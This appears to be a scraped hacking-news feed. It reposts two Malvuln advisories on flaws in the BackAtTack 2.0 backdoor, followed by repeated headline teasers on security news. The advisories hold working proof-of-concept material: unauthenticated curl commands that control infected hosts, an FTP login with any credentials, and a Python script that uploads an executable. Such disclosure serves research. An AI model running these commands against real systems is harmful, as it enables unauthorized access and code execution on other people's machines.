Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.BackAttack.20 Code Execution
https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Backdoor.Win32.BackAttack.20 malware suffers from a code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.BackAttack.20 Code Execution
https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Backdoor.Win32.BackAttack.20 malware suffers from a code execution vulnerability.
MD5 |
727ec61d4d6ef61d3f1d1caae2695804Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.BackAttack.20
Vulnerability: Unauthenticated Remote Command Execution
Description: BackAtTack 2.0 By CurrenTChaoSGroup(CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface where you can control an infected host. Third party-attackers who can reach the system can run commands made available by the malware E.g. take screenshot, restart the system, enable FTP or even destroy the backdoor etc. The web UI does not require authentication to execute these commands.
Type: PE32
MD5: 8b484576f928c256277016104cc364c2
Vuln ID: MVID-2021-0423
Disclosure: 12/11/2021
Exploit/PoC:
Show Skeleton
http://x.x.x.x/showskeleton
Show Sex
http://x.x.x.x/showsex
Whos logged on
curl http://x.x.x.x/whoisthere
Screen capture
curl http://x.x.x.x/capturescreen
Enable FTP
curl http://x.x.x.x/ftpon
Restart host
curl http://x.x.x.x/restart
Destroy the backdoor
curl http://x.x.x.x/destroyyes -v
Destroy action has been executed! -Restart procedure initiated also-
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.BackAttack.20 Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.BackAttack.20 Authentication Bypass / Code Execution
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Backdoor.Win32.BackAttack.20 malware suffers from bypass and code execution vulnerabilities.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.BackAttack.20 Authentication Bypass / Code Execution
https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Backdoor.Win32.BackAttack.20 malware suffers from bypass and code execution vulnerabilities.
MD5 |
f6246f6defa5fc357e11c1a3628bfbf9Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.BackAttack.20
Vulnerability: Authentication Bypass RCE
Description: BackAtTack 2.0 By CurrenTChaoSGroup(CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface where you can enable its FTP server. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.
Type: PE32
MD5: 8b484576f928c256277016104cc364c2
Vuln ID: MVID-2021-0424
Disclosure: 12/11/2021
Exploit/PoC:
nc64.exe 192.168.18.125 21
220 httP://www.CurrenTChaoS.Tk - BackAtTack2.0 ftp server-
USER malvuln
331 Password required for malvuln.
PASS malvuln
230 User malvuln logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
CDUP
250 CWD command successful. "C:/" is current directory.
PASV
227 Entering Passive Mode (192,168,18,125,194,33).
STOR DOOM-SM.exe
150 Opening data connection for DOOM-SM.exe.
226 File received ok
from socket import *
MALWARE_HOST="192.168.18.125"
PORT=49697
DOOM="DOOM-SM.exe"
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
f = open(DOOM, "rb")
EXE = f.read()
s.send(EXE)
while EXE:
s.send(EXE)
EXE=f.read()
s.close()
print("By Malvuln");
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.BackAttack.20 Authentication Bypass / Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Kaspersky Opens Doors to New Transparency Center in North America
The opening marks the fifth center opened globally, fulfilling a key milestone within the Global Transparency Initiative.
___________________________
@hacking_Attack
@Hacking_Video
Kaspersky Opens Doors to New Transparency Center in North America
The opening marks the fifth center opened globally, fulfilling a key milestone within the Global Transparency Initiative.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Kaspersky Opens Doors to New Transparency Center in North America
The opening marks the fifth center opened globally, fulfilling a key milestone within the Global Transparency Initiative.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Darktrace Reports Information Technology and Communications Sector Most Targeted by Cyberattackers in 2021
Most targeted industry shifts from the financial and insurance sector in 2020.
___________________________
@hacking_Attack
@Hacking_Video
Darktrace Reports Information Technology and Communications Sector Most Targeted by Cyberattackers in 2021
Most targeted industry shifts from the financial and insurance sector in 2020.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Darktrace Reports Information Technology and Communications Sector Most Targeted by Cyberattackers in 2021
Most targeted industry shifts from the financial and insurance sector in 2020.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
“FREE 350+ Tryhackme Rooms”
https://cdn-images-1.medium.com/max/1484/1*qlT8eQZH7Mzbb3TNbN6W_A.png
Hey Guys, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this blog, I will be sharing a list of 350+ Free…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
“FREE 350+ Tryhackme Rooms”
https://cdn-images-1.medium.com/max/1484/1*qlT8eQZH7Mzbb3TNbN6W_A.png
Hey Guys, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this blog, I will be sharing a list of 350+ Free…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
“FREE 350+ Tryhackme Rooms”
Hey Guys, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this blog, I will be sharing a list of 350+ Free…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
VULNERABILIDAD DE APACHE LOG4J — LOG4SHELL — AMPLIAMENTE BAJO ATAQUE ACTIVO
https://cdn-images-1.medium.com/max/833/1*9Y0zICBhSQV1xpSrpyybvw.jpeg
PUBLICADO EN 13 DICIEMBRE, 2021 POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
VULNERABILIDAD DE APACHE LOG4J — LOG4SHELL — AMPLIAMENTE BAJO ATAQUE ACTIVO
https://cdn-images-1.medium.com/max/833/1*9Y0zICBhSQV1xpSrpyybvw.jpeg
PUBLICADO EN 13 DICIEMBRE, 2021 POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
VULNERABILIDAD DE APACHE LOG4J — LOG4SHELL — AMPLIAMENTE BAJO ATAQUE ACTIVO
PUBLICADO EN 13 DICIEMBRE, 2021 POR DPAB
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cracking User Passwords Stored in Keycloak with Hashcat
https://cdn-images-1.medium.com/max/2395/1*K-Z3bSPbbYdIe0jDJjGSBw.png
It is faster and easier that you might have thought, even with crappy hardware and no profound knowledge. A brief how-to.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cracking User Passwords Stored in Keycloak with Hashcat
https://cdn-images-1.medium.com/max/2395/1*K-Z3bSPbbYdIe0jDJjGSBw.png
It is faster and easier that you might have thought, even with crappy hardware and no profound knowledge. A brief how-to.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cracking User Passwords Stored in Keycloak with Hashcat
It is faster and easier that you might have thought, even with crappy hardware and no profound knowledge. A brief how-to.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to hack a satellite
https://cdn-images-1.medium.com/max/1200/1*ZD98pzrjBww4S0PJjgf5zQ.png
The winner of the second annual Hack-A-Sat contest used an “ingenious tactic” to defeat the competition, offering lessons for U.S.
Continue reading on README_ »
___________________________
@hacking_Attack
@Hacking_Video
How to hack a satellite
https://cdn-images-1.medium.com/max/1200/1*ZD98pzrjBww4S0PJjgf5zQ.png
The winner of the second annual Hack-A-Sat contest used an “ingenious tactic” to defeat the competition, offering lessons for U.S.
Continue reading on README_ »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to hack a satellite
The winner of the second annual Hack-A-Sat contest used an “ingenious tactic” to defeat the competition, offering lessons for U.S. military…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Software company Polymer just raised millions to build the data loss prevention solution that will…
https://cdn-images-1.medium.com/max/1200/1*30LJKDeHd723x-HQtOOBLw.jpeg
Polymer’s no-code platform for automated data loss prevention (DLP) for software-as-a-service (SaaS) apps significantly leverages AI…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Software company Polymer just raised millions to build the data loss prevention solution that will…
https://cdn-images-1.medium.com/max/1200/1*30LJKDeHd723x-HQtOOBLw.jpeg
Polymer’s no-code platform for automated data loss prevention (DLP) for software-as-a-service (SaaS) apps significantly leverages AI…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Software company Polymer just raised millions to build the data loss prevention solution that will save SaaS companies
Polymer’s no-code platform for automated data loss prevention (DLP) for software-as-a-service (SaaS) apps significantly leverages AI…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
BLACKCAT: UN NUEVO MALWARE RANSOMWARE BASADO EN RUST DETECTADO EN LA NATURALEZA
https://cdn-images-1.medium.com/max/1419/0*nffv7HOFA69N-UjU
PUBLICADO EN 13 DICIEMBRE, 2021POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
BLACKCAT: UN NUEVO MALWARE RANSOMWARE BASADO EN RUST DETECTADO EN LA NATURALEZA
https://cdn-images-1.medium.com/max/1419/0*nffv7HOFA69N-UjU
PUBLICADO EN 13 DICIEMBRE, 2021POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
BLACKCAT: UN NUEVO MALWARE RANSOMWARE BASADO EN RUST DETECTADO EN LA NATURALEZA
PUBLICADO EN 13 DICIEMBRE, 2021POR DPAB